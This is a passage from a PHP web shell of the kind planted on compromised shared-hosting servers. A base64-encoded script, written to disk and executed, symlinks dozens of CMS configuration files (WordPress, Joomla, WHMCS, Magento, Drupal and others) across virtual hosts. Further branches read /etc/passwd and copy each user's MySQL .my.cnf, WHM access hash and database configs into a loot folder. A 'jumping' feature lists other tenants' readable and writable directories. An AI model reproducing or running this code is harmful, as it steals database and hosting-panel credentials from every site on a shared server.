dGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ldy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLW5ldy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9nL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmxvZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9ncy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLWJsb2dzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1ob21lLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Byb3RhbC93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3Mtc2l0ZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYWluL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy90ZXN0L3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtdGVzdC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJjYWRlL2Z1bmN0aW9ucy9kYmNsYXNzLnBocCcsJHNpdGVzcy4nLWlicHJvYXJjYWRlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2pvb21sYS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb28vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb28udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY21zL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLWNtcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXNpdGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1tYWluLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtaG9tZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92Yi9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmJ+Y29uZmlnLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiMy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIzfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jYy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIxfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bS9pbmNsdWRlcy9jbGFzc19jb3JlLnBocCcsJHNpdGVzcy4nLXZibHV0dGlufmNsYXNzX2NvcmUucGhwLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAxLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NjL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobTE1LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tY2VudHJhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0td2htY3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htL1dITUNTL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLVdITUNTLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htYy1XSE0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zZWN1cmUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1Y3VyZS13aG0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NwYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNwYW5lbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXBhbmVsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VibWl0dGlja2V0LnBocCcsJHNpdGVzcy4nLXdobWNzMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZXMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRzdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5nLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYW5hZ2UvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbWFuYWdlLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1teS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW15c2hvcC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictemVuY2FydC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXplbmNhcnQudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC1aQ3Nob3AudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc21mL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZjIudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW1zL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bXMudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJ0aWNsZS9jb25maWcucGhwJywkc2l0ZXNzLictTndhaHkudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy11cDIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZl9nbG9iYWwucGhwJywkc2l0ZXNzLictNi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlL2RiLnBocCcsJHNpdGVzcy4nLTcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29ubmVjdC5waHAnLCRzaXRlc3MuJy1QSFAtRnVzaW9uLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21rX2NvbmYucGhwJywkc2l0ZXNzLictOS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlcy9kZWZhdWx0L3NldHRpbmdzLnBocCcsJHNpdGVzcy4nLURydXBhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXIvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy0xbWVtYmVyLnR4dCcpIDsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZ3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5ncy50eHQnKSA7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3JlcXVpcmVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1BTTRTUy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3N1cHBvcnRzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtYmlsbGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1iaWxsaW5ncy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0L2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3QudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdHMvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmdzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RpbmdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RiaWxsaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RiaWxsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcC9ldGMvbG9jYWwueG1sJywkc2l0ZXNzLictTWFnZW50by50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictT3BlbmNhcnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnL3NldHRpbmdzLmluYy5waHAnLCRzaXRlc3MuJy1QcmVzdGFzaG9wLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy9rb25la3NpLnBocCcsJHNpdGVzcy4nLUxva29tZWRpYS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9sb2tvbWVkaWEvY29uZmlnL2tvbmVrc2kucGhwJywkc2l0ZXNzLictTG9rb21lZGlhLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NsY29uZmlnLnBocCcsJHNpdGVzcy4nLVNpdGVsb2NrLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcGxpY2F0aW9uL2NvbmZpZy9kYXRhYmFzZS5waHAnLCRzaXRlc3MuJy1FbGxpc2xhYi50eHQnKTsNCn0NCnByaW50ICJMb2NhdGlvbjogLi9cblxuIjs=";
662. $file = "Dav_config/vhost.cin";
663. $handle = fopen($file ,"w+");
664. fwrite($handle ,base64_decode($vhost));
665. fclose($handle);
666. chmod($file, 0755);
667. if(exe("cd Dav_config && ./vhost.cin")) {
668. echo "<center><a href='$link_config/Cr0tz_config'><font color=white>Done</font></a></center>";
669. } else {
670. echo "<center><a href='$link_config/Cr0tz_config/vhost.cin'><font color=white>Done</font></a></center>";
671. }
672.  
673. } else {
674. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
675. while($passwd = fgets($etc)) {
676. if($passwd == "" || !$etc) {
677. echo "<font color=red>Can't read /etc/passwd</font>";
678. } else {
679. preg_match_all('/(.*?):x:/', $passwd, $user_config);
680. foreach($user_config[1] as $user_idx) {
681. $user_config_dir = "/home/$user_idx/public_html/";
682. if(is_readable($user_config_dir)) {
683. $grab_config = array(
684. "/home/$user_idx/.my.cnf" => "cpanel",
685. "/home/$user_idx/.accesshash" => "WHM-accesshash",
686. "$user_config_dir/po-content/config.php" => "Popoji",
687. "$user_config_dir/vdo_config.php" => "Voodoo",
688. "$user_config_dir/bw-configs/config.ini" => "BosWeb",
689. "$user_config_dir/config/koneksi.php" => "Lokomedia",
690. "$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia",
691. "$user_config_dir/clientarea/configuration.php" => "WHMCS",
692. "$user_config_dir/whm/configuration.php" => "WHMCS",
693. "$user_config_dir/whmcs/configuration.php" => "WHMCS",
694. "$user_config_dir/forum/config.php" => "phpBB",
695. "$user_config_dir/sites/default/settings.php" => "Drupal",
696. "$user_config_dir/config/settings.inc.php" => "PrestaShop",
697. "$user_config_dir/app/etc/local.xml" => "Magento",
698. "$user_config_dir/joomla/configuration.php" => "Joomla",
699. "$user_config_dir/configuration.php" => "Joomla",
700. "$user_config_dir/wp/wp-config.php" => "WordPress",
701. "$user_config_dir/wordpress/wp-config.php" => "WordPress",
702. "$user_config_dir/wp-config.php" => "WordPress",
703. "$user_config_dir/admin/config.php" => "OpenCart",
704. "$user_config_dir/slconfig.php" => "Sitelok",
705. "$user_config_dir/application/config/database.php" => "Ellislab");
706. foreach($grab_config as $config => $nama_config) {
707. $ambil_config = file_get_contents($config);
708. if($ambil_config == '') {
709. } else {
710. $file_config = fopen("Cr0tz_config/$user_idx-$nama_config.txt","w");
711. fputs($file_config,$ambil_config);
712. }
713. }
714. }
715. }
716. }
717. }
718. echo "<center><a href='?dir=$dir/Cr0tz_config'><font color=white>Done</font></a></center>";
719. }
720. } elseif($_GET['do'] == 'jumping') {
721. $i = 0;
722. echo "<div class='margin: 5px auto;'>";
723. if(preg_match("/hsphere/", $dir)) {
724. $urls = explode("\r\n", $_POST['url']);
725. if(isset($_POST['jump'])) {
726. echo "<pre>";
727. foreach($urls as $url) {
728. $url = str_replace(array("http://","www."), "", strtolower($url));
729. $etc = "/etc/passwd";
730. $f = fopen($etc,"r");
731. while($gets = fgets($f)) {
732. $pecah = explode(":", $gets);
733. $user = $pecah[0];
734. $dir_user = "/hsphere/local/home/$user";
735. if(is_dir($dir_user) === true) {
736. $url_user = $dir_user."/".$url;
737. if(is_readable($url_user)) {
738. $i++;
739. $jrw = "[<font color=white>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
740. if(is_writable($url_user)) {
741. $jrw = "[<font color=white>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
742. }
743. echo $jrw."<br>";
744. }
745. }
746. }
747. }
748. if($i == 0) {
749. } else {
750. echo "<br>Total ada ".$i." Kimcil di ".$ip;
751. }
752. echo "</pre>";
753. } else {
754. echo '<center>
755. <form method="post">
756. List Domains: <br>
757. <textarea name="url" style="width: 500px; height: 250px;">';
758. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
759. while($getss = fgets($fp)) {
760. echo $getss;
761. }
762. echo '</textarea><br>
763. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
764. </form></center>';
765. }
766. } elseif(preg_match("/vhosts|vhost/", $dir)) {
767. preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
768. $urls = explode("\r\n", $_POST['url']);
769. if(isset($_POST['jump'])) {
770. echo "<pre>";
771. foreach($urls as $url) {
772. $url = str_replace("www.", "", $url);
773. $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
774. if(is_dir($web_vh) === true) {
775. if(is_readable($web_vh)) {
776. $i++;
777. $jrw = "[<font color=white>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
778. if(is_writable($web_vh)) {
779. $jrw = "[<font color=white>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
780. }
781. echo $jrw."<br>";
782. }
783. }
784. }
785. if($i == 0) {
786. } else {
787. echo "<br>Total ada ".$i." Kimcil di ".$ip;
788. }
789. echo "</pre>";
790. } else {
791. echo '<center>
792. <form method="post">
793. List Domains: <br>
794. <textarea name="url" style="width: 500px; height: 250px;">';
795. bing("ip:$ip");
796. echo '</textarea><br>
797. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
798. </form></center>';
799. }
800. } else {
801. echo "<pre>";
802. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
803. while($passwd = fgets($etc)) {
804. if($passwd == '' || !$etc) {
805. echo "<font color=red>Can't read /etc/passwd</font>";
806. } else {
807. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
808. foreach($user_jumping[1] as $user_idx_jump) {
809. $user_jumping_dir = "/home/$user_idx_jump/public_html";
810. if(is_readable($user_jumping_dir)) {
811. $i++;
812. $jrw = "[<font color=white>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
